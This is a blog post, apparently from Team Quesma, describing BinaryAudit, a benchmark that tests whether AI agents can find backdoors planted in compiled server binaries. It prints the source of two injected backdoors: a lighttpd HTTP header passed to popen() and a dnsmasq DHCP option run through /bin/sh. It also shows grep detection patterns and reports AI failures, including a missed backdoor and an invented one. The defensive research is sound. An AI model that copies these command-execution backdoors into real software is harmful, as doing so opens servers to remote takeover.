<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Team Quesma</title>
    <description>The latest articles on DEV Community by Team Quesma (@teamquesma).</description>
    <link>https://dev.to/teamquesma</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3669005%2Fd0fb5411-2307-4264-9b21-7398290a46ac.png</url>
      <title>DEV Community: Team Quesma</title>
      <link>https://dev.to/teamquesma</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/teamquesma"/>
    <language>en</language>
    <item>
      <title>We hid backdoors in binaries — Opus 4.6 found 49% of them</title>
      <dc:creator>Team Quesma</dc:creator>
      <pubDate>Thu, 19 Feb 2026 11:55:22 +0000</pubDate>
      <link>https://dev.to/teamquesma/we-hid-backdoors-in-binaries-opus-46-found-49-of-them-cpp</link>
      <guid>https://dev.to/teamquesma/we-hid-backdoors-in-binaries-opus-46-found-49-of-them-cpp</guid>
      <description>&lt;p&gt;&lt;em&gt;This blog post was authored by &lt;a href="https://www.linkedin.com/in/piotr-grabowski-7a87522b3/" rel="noopener noreferrer"&gt;Piotr Grabowski&lt;/a&gt;, &lt;a href="https://www.linkedin.com/in/nablaone/" rel="noopener noreferrer"&gt;Rafał Strzaliński&lt;/a&gt;, &lt;a href="https://mkow.ch/" rel="noopener noreferrer"&gt;Michał Kowalczyk&lt;/a&gt;, &lt;a href="https://p.migdal.pl/" rel="noopener noreferrer"&gt;Piotr Migdał&lt;/a&gt;, and &lt;a href="https://www.linkedin.com/in/jacekmigdal/" rel="noopener noreferrer"&gt;Jacek Migdal&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Claude can code, but can it check binary executables?&lt;/p&gt;

&lt;p&gt;We already did our experiments with &lt;a href="https://quesma.com/blog/ghidra-mcp-unlimited-lives/" rel="noopener noreferrer"&gt;using NSA software to hack a classic Atari game&lt;/a&gt;. This time we want to focus on a much more practical task — using AI agents for malware detection. We partnered with Michał “Redford” Kowalczyk, reverse engineering expert from Dragon Sector, known for &lt;a href="https://badcyber.com/dieselgate-but-for-trains-some-heavyweight-hardware-hacking/#main" rel="noopener noreferrer"&gt;finding malicious code in Polish trains&lt;/a&gt;, to create a benchmark of finding backdoors in binary executables, without access to source code.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyz7pqk02nvfp1t8ib1by.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyz7pqk02nvfp1t8ib1by.webp" alt="BinaryAudit Model Rankings showing Claude Opus 4.6 leading at 49% pass rate" width="800" height="499"&gt;&lt;/a&gt;See &lt;a href="https://quesma.com/benchmarks/binaryaudit/" rel="noopener noreferrer"&gt;BinaryAudit &lt;/a&gt;for the full benchmark results — including false positive rates, tool proficiency, and the Pareto frontier of cost-effectiveness. All tasks are open source and available at &lt;a href="https://github.com/quesmaOrg/BinaryAudit" rel="noopener noreferrer"&gt;quesmaOrg/BinaryAudit&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;We were surprised that today’s AI agents can detect some hidden backdoors in binaries. We hadn’t expected them to possess such specialized reverse engineering capabilities.&lt;/p&gt;

&lt;p&gt;However, this approach is not ready for production. Even the best model, Claude Opus 4.6, found relatively obvious backdoors in small/mid-size binaries only 49% of the time. Worse yet, most models had a high false positive rate — flagging clean binaries.&lt;/p&gt;

&lt;p&gt;In this blog post, we discuss a few recent security stories, explain what binary analysis is, and how we construct a benchmark for AI agents. We will see when they accomplish tasks and when they fail — by missing malicious code or by reporting false findings.&lt;/p&gt;

&lt;h2&gt;
  
  
  Background
&lt;/h2&gt;

&lt;p&gt;Just a few months ago &lt;a href="https://entro.security/blog/shai-hulud-2-0-banks-gov-tech-breach/" rel="noopener noreferrer"&gt;Shai Hulud 2.0&lt;/a&gt; compromised thousands of organizations, including Fortune 500 companies, banks, governments, and cool startups — &lt;a href="https://posthog.com/blog/nov-24-shai-hulud-attack-post-mortem" rel="noopener noreferrer"&gt;see postmortem by PostHog&lt;/a&gt;. It was a supply chain attack for the Node Package Manager ecosystem, injecting malicious code stealing credentials.&lt;/p&gt;

&lt;p&gt;Just a few days ago, &lt;a href="https://notepad-plus-plus.org/news/hijacked-incident-info-update/" rel="noopener noreferrer"&gt;Notepad++ shared updates on a hijack by state-sponsored actors&lt;/a&gt;, who replaced legitimate binaries with infected ones.&lt;/p&gt;

&lt;p&gt;Even the physical world is at stake, including critical infrastructure. For example, researchers found &lt;a href="https://www.reuters.com/sustainability/climate-energy/ghost-machine-rogue-communication-devices-found-chinese-inverters-2025-05-14/" rel="noopener noreferrer"&gt;hidden radios in Chinese solar power inverters&lt;/a&gt; and &lt;a href="https://www.theguardian.com/world/2025/nov/05/danish-authorities-in-rush-to-close-security-loophole-in-chinese-electric-buses" rel="noopener noreferrer"&gt;security loopholes in electric buses&lt;/a&gt;. Every digital device has a firmware, which is much harder to check than software we install on the computer — and has much more direct impact. Both state and corporate actors have incentive to tamper with these.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvxudvlkkgwrcvi9ug0mp.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvxudvlkkgwrcvi9ug0mp.webp" alt="Michał 'Redford' Kowalczyk from Dragon Sector on Chaos Communication Congress on Breaking DRM in Polish trains." width="800" height="369"&gt;&lt;/a&gt;Michał “Redford” Kowalczyk from Dragon Sector on &lt;a href="https://media.ccc.de/v/37c3-12142-breaking_drm_in_polish_trains" rel="noopener noreferrer"&gt;reverse engineering a train to analyze a suspicious malfunction&lt;/a&gt;, the most popular talk at the &lt;a href="https://media.ccc.de/c/37c3" rel="noopener noreferrer"&gt;37th Chaos Communication Congress&lt;/a&gt;. See also &lt;a href="https://badcyber.com/dieselgate-but-for-trains-some-heavyweight-hardware-hacking/#main" rel="noopener noreferrer"&gt;Dieselgate, but for trains&lt;/a&gt; writeup and &lt;a href="https://news.ycombinator.com/item?id=42538914" rel="noopener noreferrer"&gt;a subsequent discussion&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;You do not even need bad actors. Network routers often have &lt;a href="https://arstechnica.com/information-technology/2021/01/hackers-are-exploiting-a-backdoor-built-into-zyxel-devices-are-you-patched/" rel="noopener noreferrer"&gt;hidden admin passwords baked into their firmware&lt;/a&gt; so the vendor can troubleshoot remotely — but anyone who discovers those passwords gets the same access.&lt;/p&gt;

&lt;p&gt;Can we use AI agents to protect against such attacks?&lt;/p&gt;




&lt;h2&gt;
  
  
  Binary analysis
&lt;/h2&gt;

&lt;p&gt;In day-to-day programming, we work with source code. It relies on high-level abstractions: classes, functions, types, organized into a clear file structure. LLMs excel here because they are trained on this human-readable logic.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Malware analysis forces us into a harder world: binary executables.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Compilation translates high-level languages (like Go or Rust) into low-level machine code for a given CPU architecture (such as x86 or ARM). We get raw CPU instructions: moving data between registers, adding numbers, or jumping to memory addresses. The original code structure, together with variables and functions names gets lost.&lt;/p&gt;

&lt;p&gt;To make matters worse, compilers aggressively optimize for speed, not readability. They inline functions (changing the call hierarchy), unroll loops (replacing concise logic with repetitive blocks), and reorder instructions to keep the processor busy.&lt;/p&gt;

&lt;p&gt;Yet, a binary is what users actually run. And for closed-source and binary-distributed software, it is all we have.&lt;/p&gt;

&lt;p&gt;Analyzing binaries is a long and tedious process of reverse engineering, which starts with a chain of translations: &lt;strong&gt;machine code → assembly → pseudo-C&lt;/strong&gt;. Let’s see how an example backdoor looks in those representations:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Raw Binary&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;b9 01 00 00 00 48 89 df ba e0 00 00 00 e8 b6 c6 ff ff 49 89 c5 48 85 c0 74 6e 44 0f b6 40 01 4c 8d 8c 24 a0 01 00 00 49 8d 75 02 4c 89 cf 4c 89 c0 41 83 f8 08 72 0a 4c 89 c1 48 c1 e9 03 f3 48 a5 31 d2 41 f6 c0 04 74 09 8b 16 89 17 ba 04 00 00 00 41 f6 c0 02 74 0c 0f b7 0c 16 66 89 0c 17 48 83 c2 02 41 83 e0 01 74 07 0f b6 0c 16 88 0c 17 4c 89 cf c6 84 04 a0 01 00 00 00 e8 b7 4c fd ff
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;2. Disassembly&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;33e88:  mov    ecx, 0x1
33e8d:  mov    rdi, rbx
33e90:  mov    edx, 0xe0
33e95:  call   30550
33e9a:  mov    r13, rax
33e9d:  test   rax, rax
33ea0:  je     33f10
33ea2:  movzx  r8d, BYTE PTR [rax+1]
33ea7:  lea    r9, [rsp+0x1a0]
33eaf:  lea    rsi, [r13+0x2]
        ... (omitted for brevity)
33efc:  mov    BYTE PTR [rsp+rax+0x1a0], 0x0
33f04:  call   system@plt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;3. Decompiled&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;lVar18 = FUN_00130550(pcVar41, param_4, 0xe0, 1);

if (lVar18 != 0) {
    bVar49 = *(byte *)(lVar18 + 1);
    puVar26 = (undefined8 *)(lVar18 + 2);
    pcVar20 = (char *)&amp;amp;local_148;

    if (7 &amp;lt; bVar49) {
        for (uVar44 = (ulong)(bVar49 &amp;gt;&amp;gt; 3); uVar44 != 0; uVar44--) {
            *(undefined8 *)pcVar20 = *puVar26;
            puVar26++; pcVar20 += 8;
        }
    }

    *(undefined1 *)((long)&amp;amp;local_148 + (ulong)bVar49) = 0;

    system((char *)&amp;amp;local_148);
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Going from raw bytes to assembly is straightforward, as it can be viewed with a command-line tool like &lt;a href="https://en.wikipedia.org/wiki/Objdump" rel="noopener noreferrer"&gt;objdump&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Turning assembly into C is much harder — we need reverse engineering tools, such as open-source &lt;a href="https://github.com/NationalSecurityAgency/ghidra" rel="noopener noreferrer"&gt;Ghidra&lt;/a&gt; (created by NSA) and &lt;a href="https://rada.re/" rel="noopener noreferrer"&gt;Radare2&lt;/a&gt;, or commercial ones like &lt;a href="https://hex-rays.com/ida-pro" rel="noopener noreferrer"&gt;IDA Pro&lt;/a&gt; and &lt;a href="https://binary.ninja/" rel="noopener noreferrer"&gt;Binary Ninja&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;The decompilers try their best at making sense of the CPU instructions and generating a readable C code. But since all those high-level abstractions and variable names got lost during compilation, the output is far from perfect. You see output full of &lt;code&gt;FUN_00130550&lt;/code&gt;, &lt;code&gt;bVar49&lt;/code&gt;, &lt;code&gt;local_148&lt;/code&gt; — names that mean nothing.&lt;/p&gt;




&lt;h2&gt;
  
  
  The benchmark
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Tasks
&lt;/h3&gt;

&lt;p&gt;We ask AI agents to analyze binaries and determine if they contain backdoors or malicious modifications.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdhfdbj1fbd0lif6ei9dw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdhfdbj1fbd0lif6ei9dw.png" alt=" " width="800" height="179"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We started with several open-source projects: &lt;a href="https://www.lighttpd.net/" rel="noopener noreferrer"&gt;lighttpd&lt;/a&gt; (a C web server), &lt;a href="https://dnsmasq.org/" rel="noopener noreferrer"&gt;dnsmasq&lt;/a&gt; (a C DNS/DHCP server), &lt;a href="https://github.com/mkj/dropbear" rel="noopener noreferrer"&gt;Dropbear&lt;/a&gt; (a C SSH server), and &lt;a href="https://github.com/sozu-proxy/sozu" rel="noopener noreferrer"&gt;Sozu&lt;/a&gt; (a Rust load balancer). Then, we manually injected backdoors. For example, we hid a mechanism for an attacker to execute commands via an undocumented HTTP header.&lt;/p&gt;

&lt;p&gt;Important caveat: All backdoors in this benchmark are artificially injected for testing. We do not claim these projects have real vulnerabilities; they are legitimate open-source software that we modified in controlled ways.&lt;/p&gt;

&lt;p&gt;These backdoors weren’t particularly sophisticated — we didn’t try to heavily obfuscate them or hide them in obscure parts of the code. They are the kind of anomaly a skilled human reverse engineer could spot relatively easily.&lt;/p&gt;

&lt;p&gt;The agents are given a compiled executable — without source code or debug symbols. They have access to reverse engineering tools: &lt;a href="https://github.com/NationalSecurityAgency/ghidra" rel="noopener noreferrer"&gt;Ghidra&lt;/a&gt;, &lt;a href="https://rada.re/" rel="noopener noreferrer"&gt;Radare2&lt;/a&gt;, and &lt;a href="https://www.gnu.org/software/binutils/" rel="noopener noreferrer"&gt;binutils&lt;/a&gt;. The task is to identify malicious code and pinpoint the start address of the function containing the backdoor (e.g., &lt;code&gt;0x4a1c30&lt;/code&gt;). See &lt;a href="https://github.com/QuesmaOrg/BinaryAudit/blob/main/tasks/dnsmasq-backdoor-detect-printf/instruction.md" rel="noopener noreferrer"&gt;dnsmasq-backdoor-detect-printf/instruction.md&lt;/a&gt; for a typical instruction.&lt;/p&gt;

&lt;p&gt;A few tasks use a different methodology: we present three binaries and ask which ones contain backdoors, without asking for the specific location – see e.g. &lt;a href="https://github.com/QuesmaOrg/BinaryAudit/blob/main/tasks/sozu-backdoor-multiple-binaries-detect/instruction.md" rel="noopener noreferrer"&gt;sozu-backdoor-multiple-binaries-detect/instruction.md&lt;/a&gt;. We expected this to be a simpler task (it wasn’t). This approach simulates supply chain attacks, where often only a subset of binaries are altered.&lt;/p&gt;

&lt;h3&gt;
  
  
  An example when it works
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Backdoor in an HTTP server
&lt;/h4&gt;

&lt;p&gt;We injected a backdoor into the lighttpd server that executes shell commands from an undocumented HTTP header.&lt;/p&gt;

&lt;p&gt;Here’s the core of the injected backdoor — it looks for a hidden &lt;code&gt;X-Forwarded-Debug header&lt;/code&gt;, executes its contents as a shell command via &lt;code&gt;popen()&lt;/code&gt;, and returns the output in a response header:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;gboolean li_check_debug_header(liConnection *con) {
    liRequest *req = &amp;amp;con-&amp;gt;mainvr-&amp;gt;request;
    GList *l;

    l = li_http_header_find_first(req-&amp;gt;headers, CONST_STR_LEN("X-Forwarded-Debug"));
    if (NULL != l) {
        liHttpHeader *hh = (liHttpHeader*) l-&amp;gt;data;
        char *debugIn = LI_HEADER_VALUE(hh);

        FILE *fp = popen(debugIn, "r");  // Execute attacker's command
        // ... read output into debugOut ...
        pclose(fp);

        li_http_header_insert(con-&amp;gt;mainvr-&amp;gt;response.headers,
            CONST_STR_LEN("X-Request-Trace"), debugOut, strlen(debugOut));
    }
    return TRUE;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For a user who downloaded this backdoored server, it would seem like this is a legitimate program. However, an attacker could trivially execute any command by sending a specially crafted packet.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Claude Opus 4.5 found the backdoor within 5 minutes&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Here’s how Claude did it:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1.&lt;/strong&gt; The model identified the binary and its 26 shared libraries — one of which contained the backdoor.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 2.&lt;/strong&gt; Next, it ran &lt;code&gt;strings&lt;/code&gt;with grep patterns looking for obvious indicators of a backdoor:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;strings bin/lighttpd2-worker | grep -iE '(shell|bash|/bin/sh|exec|system|backdoor)'
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;However, the command didn’t find anything suspicious. The model expanded the search to all shared libraries, looking for more patterns (hardcoded IPs, suspicious commands, and credential patterns). Still nothing obvious.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 3.&lt;/strong&gt; Claude switched strategies and used &lt;code&gt;nm -D&lt;/code&gt; to list imported functions:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;for f in lib/*.so; do
  nm -D "$f" | grep -E ' U (system|exec|popen)'
done
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This revealed something interesting:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;lib/liblighttpd2-shared-2.0.0.so: U popen@GLIBC_2.2.5
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Claude detected that one of the libraries that the server uses imports &lt;code&gt;popen()&lt;/code&gt;: function used to execute shell commands. It immediately alarmed the model:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Claude Opus 4.5:&lt;/strong&gt; The &lt;code&gt;liblighttpd2-shared.so&lt;/code&gt; uses &lt;code&gt;popen()&lt;/code&gt;. This could be legitimate (for spawning worker processes) or could be a backdoor. I need to investigate what these functions are used for by decompiling the code.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Step 4.&lt;/strong&gt; Claude investigated further to determine if the function was truly malicious, using the Radare2 decompiler for analysis.&lt;/p&gt;

&lt;p&gt;It first identified which function calls &lt;code&gt;popen()&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;r2 -q -c 'aaa; axt @ sym.imp.popen' lib/liblighttpd2-shared-2.0.0.so
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The output of this command revealed that a function called &lt;code&gt;li_check_debug_header&lt;/code&gt; does shell execution. (That’s the backdoor we added!). The model smelled something fishy:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Claude Opus 4.5:&lt;/strong&gt; This is very suspicious! A “debug header” function calling &lt;code&gt;popen&lt;/code&gt;is a classic backdoor pattern — it could be checking for a special HTTP header and executing commands based on it.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Then using Radare2’s decompiler, the model examined the function:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;r2 -q -c 'aaa; s dbg.li_check_debug_header; pdc' lib/liblighttpd2-shared-2.0.0.so
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The decompiled pseudocode allowed the LLM to understand how the backdoor works — it looks for an undocumented HTTP header &lt;code&gt;X-Forwarded-Debug&lt;/code&gt; and if it’s present executes an attacker-provided command. The server conveniently sends the command output back in a &lt;code&gt;X-Request-Trace&lt;/code&gt; response header.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 5.&lt;/strong&gt; Finally, Claude used Radare2 to confirm the function wasn’t dead code, checking cross-references to ensure it was called from the main program:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;r2 -q -c 'aaa; s 0x00015260; pd 10' lib/liblighttpd2-shared-2.0.0.so
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now being confident that it found a real backdoor, Claude reported those findings back and finished the exploration.&lt;/p&gt;

&lt;h3&gt;
  
  
  When it fails: rationalizing away an obvious backdoor
&lt;/h3&gt;

&lt;h4&gt;
  
  
  DHCP backdoor
&lt;/h4&gt;

&lt;p&gt;However, LLMs very often miss even obvious backdoors.&lt;/p&gt;

&lt;p&gt;We took dnsmasq — a widely-used DNS/DHCP server — and added an embarrassingly obvious backdoor. We weren’t even trying to hide it: if DHCP option 224 (undocumented, we made it up) is present in a packet, execute its contents as a shell command via &lt;code&gt;execl("/bin/sh", "sh", "-c", buf, NULL)&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;The backdoor we added was just 7 lines of C in DHCP packet parsing:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/* existing DHCP option handling */
match_vendor_opts(opt, daemon-&amp;gt;dhcp_opts);
+ if (opt = option_find(mess, sz, 224, 1)) {
+   char buf[256];
+   int len = option_len(opt);
+   memcpy(buf, option_ptr(opt, 0), len);
+   buf[len] = '\0';
+   execl("/bin/sh", "sh", "-c", buf, NULL);
+ }
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Claude Opus 4.6 found it… and persuaded itself there is nothing to worry about&lt;/strong&gt; &lt;br&gt;
Even the best model in our benchmark got fooled by this task. Claude Opus 4.6 found &lt;code&gt;/bin/sh&lt;/code&gt; in the strings output early on, traced it to the exact function containing the backdoor, and saw the &lt;code&gt;execl("/bin/sh", "sh", "-c", ...)&lt;/code&gt; call. Then it simply assumed it was normal:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Claude Opus 4.6:&lt;/strong&gt; I can see the &lt;code&gt;/bin/sh&lt;/code&gt; usage at &lt;code&gt;0x42e9df&lt;/code&gt;— it’s calling &lt;code&gt;execl("/bin/sh", "sh", "-c", r13, NULL)&lt;/code&gt;. This is a pattern for executing a shell command, which could be legitimate in dnsmasq (e.g., for DHCP script execution).&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;It examined the function, but concluded:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Claude Opus 4.6:&lt;/strong&gt; The &lt;code&gt;execl("/bin/sh", "sh", "-c", ...)&lt;/code&gt; pattern is typical of dnsmasq’s DHCP lease script execution. This is likely the legitimate lease_helper/script execution function.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The model found the exact function, saw the exact &lt;code&gt;execl&lt;/code&gt; call with &lt;code&gt;/bin/sh -c&lt;/code&gt; — and rationalized it away as “legitimate DHCP script execution.” It never checked where the command string actually comes from (a DHCP packet from client). It then moved on to investigate other functions and never circled back.&lt;/p&gt;

&lt;h3&gt;
  
  
  The needle-in-haystack problem
&lt;/h3&gt;

&lt;p&gt;The executables in our benchmark often have hundreds or thousands of functions — while the backdoors are tiny, often just a dozen lines buried deep within. Finding them requires strategic thinking: identifying critical paths like network parsers or user input handlers and ignoring the noise.&lt;/p&gt;

&lt;p&gt;Current LLMs lack this high-level intuition. Instead of prioritizing high-risk areas, they often decompile random functions or grep for obvious keywords like &lt;code&gt;system()&lt;/code&gt; or &lt;code&gt;exec()&lt;/code&gt;. When simple heuristics fail, models frequently hallucinate or give up entirely.&lt;/p&gt;

&lt;p&gt;This lack of focus leads them down rabbit holes. We observed agents fixating on legitimate libraries — treating them as suspicious anomalies. They wasted their entire context window auditing benign code while the actual backdoor remained untouched in a completely different part of the binary.&lt;/p&gt;




&lt;h2&gt;
  
  
  Limitations
&lt;/h2&gt;

&lt;h3&gt;
  
  
  False positives
&lt;/h3&gt;

&lt;p&gt;The security community is drowning in AI-generated noise. The curl project recently &lt;a href="https://daniel.haxx.se/blog/2024/01/02/the-i-in-llm-stands-for-intelligence/" rel="noopener noreferrer"&gt;stopped paying for bug reports&lt;/a&gt; partly because of AI slop:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;The vast majority of AI-generated error reports submitted to cURL are pure nonsense.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;A security tool which gives you fake reports is useless and frustrating to use. We specifically tested for this with &lt;strong&gt;negative tasks&lt;/strong&gt; — clean binaries with no backdoor. We found that 28% of the time models reported backdoors or issues that weren’t real. For any practical malware detection software, we expect a false positive rate of less than 0.001%, as most software is safe, vide &lt;a href="https://en.wikipedia.org/wiki/Base_rate_fallacy" rel="noopener noreferrer"&gt;false positive paradox&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F90q2xhtlpv9hxw5qbj13.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F90q2xhtlpv9hxw5qbj13.webp" alt="Model ranking on false positive rate showing how often models incorrectly report backdoors in clean binaries" width="800" height="526"&gt;&lt;/a&gt;False positive rate measures how often models incorrectly report backdoors in clean binaries. Lower is better. See also &lt;a href="https://quesma.com/benchmarks/binaryaudit/#roc" rel="noopener noreferrer"&gt;detection vs false alarm&lt;/a&gt;s combining it with pass rate.&lt;/p&gt;

&lt;p&gt;For example, Gemini 3 Pro supposedly “discovered” a backdoor in… command-line argument parsing in one of the servers:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Gemini 3 Pro:&lt;/strong&gt; I have confirmed that the &lt;code&gt;max-cache-ttl&lt;/code&gt; option (index 312, &lt;code&gt;0x138&lt;/code&gt;) is handled by code that treats its argument as a string and stores it at offset &lt;code&gt;0x138&lt;/code&gt; of the global configuration structure. This is highly suspicious for a TTL option which should be an integer.&lt;br&gt;
Furthermore, the function &lt;code&gt;fcn.0002b260&lt;/code&gt; reads the string from offset &lt;code&gt;0x138&lt;/code&gt;, appends ” ini” to it, and executes it using &lt;code&gt;popen&lt;/code&gt;. The output is then parsed for a “duid”.&lt;br&gt;
This behavior allows an attacker to execute arbitrary commands by passing them as the argument to the &lt;code&gt;--max-cache-ttl&lt;/code&gt; option (e.g., &lt;code&gt;--max-cache-ttl=/bin/sh&lt;/code&gt;). This is a clear backdoor disguised as a legitimate configuration option.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;In reality, the source code correctly validates and parses the command-line argument as a number. It never attempts to execute it. Several “findings” that the model reported are completely fake and missing from the source code.&lt;/p&gt;

&lt;h3&gt;
  
  
  The gap in open-source tooling
&lt;/h3&gt;

&lt;p&gt;We restricted agents to open-source tools: &lt;a href="https://github.com/NationalSecurityAgency/ghidra" rel="noopener noreferrer"&gt;Ghidra&lt;/a&gt; and &lt;a href="https://rada.re/" rel="noopener noreferrer"&gt;Radare2&lt;/a&gt;. We verified that frontier models (including Claude Opus 4.6 and Gemini 3 Pro) achieve a 100% success rate at &lt;a href="https://quesma.com/benchmarks/binaryaudit/tasks/ghidra-decompile-pyghidra/" rel="noopener noreferrer"&gt;operating them&lt;/a&gt; — correctly loading binaries and running basic commands.&lt;/p&gt;

&lt;p&gt;However, these open-source decompilers lag behind commercial alternatives like &lt;a href="https://hex-rays.com/ida-pro" rel="noopener noreferrer"&gt;IDA Pro&lt;/a&gt;. While they handle C binaries well, they have issues with Rust (though agents managed to solve some tasks), and fail completely with Go executables.&lt;/p&gt;

&lt;p&gt;For example, we tried to work with &lt;a href="https://github.com/caddyserver/caddy" rel="noopener noreferrer"&gt;Caddy&lt;/a&gt;, a web server written in Go, with a binary weighing 50MB. Radare2 loaded in 6 minutes but produced poor quality code, while Ghidra not only took 40 minutes just to load, but was not able to return correct data. At the same time, IDA Pro loaded in 5 minutes, giving correct, usable code, sufficient for manual analysis.&lt;/p&gt;

&lt;p&gt;To ensure we measure agent intelligence rather than tool quality, we excluded Go binaries and focused mostly on C executables (and one Rust project) where the tooling is reliable.&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Results
&lt;/h3&gt;

